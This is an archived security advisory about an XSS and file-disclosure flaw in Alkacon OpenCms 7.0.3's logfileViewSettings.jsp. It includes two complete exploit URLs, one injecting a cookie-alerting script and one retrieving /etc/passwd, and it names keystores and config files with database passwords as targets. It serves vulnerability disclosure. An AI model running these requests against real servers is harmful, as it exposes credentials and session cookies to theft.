Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: bx2285.htm

Alkacon OpenCms logfileViewSettings.jsp XSS, file disclosure



Alkacon OpenCms logfileViewSettings.jsp XSS, file disclosure
Alkacon OpenCms logfileViewSettings.jsp XSS, file disclosure



Alkacon OpenCms logfileViewSettings.jsp XSS, file disclosure=0D
=0D
=0D
Product: Alkacon OpenCms =0D
http://www.opencms.org/=0D 
=0D
=0D
OpenCms contains a vulnerability in the Logfile Viewer Settings function. Input to Parameter filePath.0 in page opencms/system/workplace/admin/workplace/logfileview/logfileViewSettings.jsp is not sufficiently validated and/or sanitized. This can be exploited as a cross-site scripting issue but also as a file access issue, which allows a disclosure of arbitrary files that are readable in the OS security context of the JSP container process. The resulting page even has a "Download" button, which facilitates retrieving binary files. Possible targeted files could be /etc/passwd, /proc pseudo-files, Java keystore, OpenCms configuration file (with database password), etc.=0D
=0D
Only OpenCms users in administrator roles have access to the vulnerable URL, which partially reduces the severity of the file disclosure aspect.=0D
=0D
Example 1 (XSS):=0D
http://(target)/opencms/system/workplace/admin/workplace/logfileview/logfileViewSettings.jsp?=0D 
isLogfile.0=true&isLogfile.0.value=true&enabled.0=true&enabled.0.value=true=0D
&ok=Ok&action=save=0D
&closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace%252Flogfileview=0D
&elementname=undefined&page=page1&style=new=0D
&path=%252Fworkplace%252Flogfileview%252FlogfileViewSettings=0D
&elementindex=0&framename=admin_content&windowSize.0=8000&fileEncoding.0=UTF-8=0D
&filePath.0=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E=0D
=0D
Example 2 (retrieving /etc/passwd):=0D
http://(target)/opencms/system/workplace/admin/workplace/logfileview/logfileViewSettings.jsp?=0D 
isLogfile.0=true&isLogfile.0.value=true&enabled.0=true&enabled.0.value=true=0D
&ok=Ok&action=save=0D
&closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace%252Flogfileview=0D
&elementname=undefined&page=page1&style=new=0D
&path=%252Fworkplace%252Flogfileview%252FlogfileViewSettings=0D
&elementindex=0&framename=admin_content&windowSize.0=8000&fileEncoding.0=UTF-8=0D
&filePath.0=%2Fetc%2Fpasswd=0D
=0D
=0D
The vulnerability has been identified in version 7.0.3. However, other versions may be also affected.=0D
=0D
=0D
Solution:=0D
Users should not browse untrusted sites while logged into OpenCms.=0D
=0D
=0D
Found by:=0D
nnposter=0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH